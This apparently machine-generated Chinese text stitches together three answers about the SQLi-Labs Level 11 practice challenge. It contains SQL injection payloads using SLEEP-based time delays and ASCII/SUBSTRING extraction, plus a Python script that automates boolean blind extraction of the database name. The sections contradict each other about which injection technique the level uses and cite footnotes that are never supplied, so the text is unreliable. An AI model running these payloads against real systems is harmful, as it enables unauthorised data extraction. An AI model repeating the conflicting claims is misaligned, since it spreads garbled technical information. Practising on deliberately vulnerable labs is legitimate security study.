sqli-labs1 11

### 关于 SQLi-Labs Level 11 的信息

SQLi-Labs 是一套用于学习和练习 SQL 注入技术的实验环境。Level 11 主要关注基于时间盲注的时间延迟攻击[^1]。

#### 时间盲注原理
在这种类型的注入中，数据库不会返回任何错误消息或数据，而是通过执行特定查询来判断条件真假。如果条件为真，则会触发一个长时间运行的操作（如 `SLEEP()` 函数），从而导致页面响应变慢；反之则正常加载速度不变。

对于 SQLi-Labs Level 11 来说，目标是在不显示具体反馈的情况下推断出隐藏信息。通常做法如下：

- 使用布尔表达式配合 SLEEP() 函数构建 payload；
- 测试不同字符集范围内的单个字节是否匹配预期值；
- 根据服务器响应时间差异逐步恢复整个字符串内容。

' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>97,SLEEP(5),NULL) --

上述 Payload 将尝试获取当前数据库中的第一个表名的第一个字母，并检查其 ASCII 值是否大于 97 (即 'a')。如果是的话，将会使请求暂停五秒钟再继续处理。

相关问题

完成sqli-labs pass11

### SQLi-Labs Level 11 挑战解析

在 SQLi-Labs 的第十一关中，目标是在给定的 URL 中利用 SQL 注入漏洞获取数据库中的信息。此关卡涉及到了基于布尔盲注的方式来进行攻击。

URL 示例为 `http://localhost/sqli-labs-master/Less-11/?id=1`[^1]。为了成功执行注入并绕过过滤器，可以采用如下策略：

#### 利用 ASCII 和 SUBSTRING 函数逐位猜解数据

由于页面会根据查询条件返回不同的响应（存在记录与否），可以通过构造特定的 SQL 查询语句来判断每一个字符是否匹配预期值。具体来说，就是使用 MySQL 提供的 `ASCII()` 函数配合 `SUBSTRING()` 来实现对表名或列名等敏感信息的逐字节猜测。

下面是一个简单的 Python 脚本用于自动化这一过程:

import requests

url = 'http://localhost/sqli-labs-master/Less-11/'
true_str = "You are in"
false_str = "You are not"

def check(payload):
    r = requests.get(url, params={'id': payload})
    return true_str in r.text

for i in range(1, 20):  # 假设最长长度不超过20个字符
    found_char = False
    for j in range(32, 128):  # 只考虑可打印字符
        payload = f"1' AND (SELECT ASCII(SUBSTRING(database(),{i},1)))={j} -- "
        if check(payload):
            print(chr(j), end='')
            found_char = True
            break
    if not found_char:
        break
print()

这段代码尝试从第一个字符开始依次确定当前数据库名称的各个字母是什么，并将其打印出来直到遇到未知字符为止。

需要注意的是，在实际环境中应当合法合规地测试网站安全性，未经授权不得对他人的服务器发起此类请求。

sqli-labs less11

### 关于 sqli-labs Lesson 11 的解决方案

sqli-labs 是一个用于学习和练习 SQL 注入技巧的平台。Lesson 11 主要涉及基于时间盲注的时间延迟攻击。

在这个特定的挑战中，目标是从数据库中提取信息而无需任何直接反馈显示在网页上。这通常涉及到使用 `sleep()` 函数让服务器等待一段时间作为条件判断的结果[^1]。

对于 Lesson 11 来说，可以通过构建如下形式的有效载荷来进行测试：

1' AND IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),0) --

这段代码的作用是在 MySQL 版本号的第一个字符等于 '5' 时使服务器暂停五秒。通过调整 SUBSTRING 中的位置参数以及比较值，可以逐步推测出完整的版本字符串[^2]。

为了提高效率并减少手动工作量，还可以利用像 sqlmap 这样的自动化工具来执行上述过程。Sqlmap 支持多种技术手段自动探测和利用 SQL 注入漏洞，包括但不限于布尔型盲注、基于错误的信息泄露、联合查询注入等。特别是当面对复杂的编码机制或者需要处理大量数据的情况下，sqlmap 提供了许多内置功能帮助简化任务[^3]。

值得注意的是，在实际环境中实施这些技能之前应当确保拥有合法授权，并仅限于教育目的范围内实践此类技术。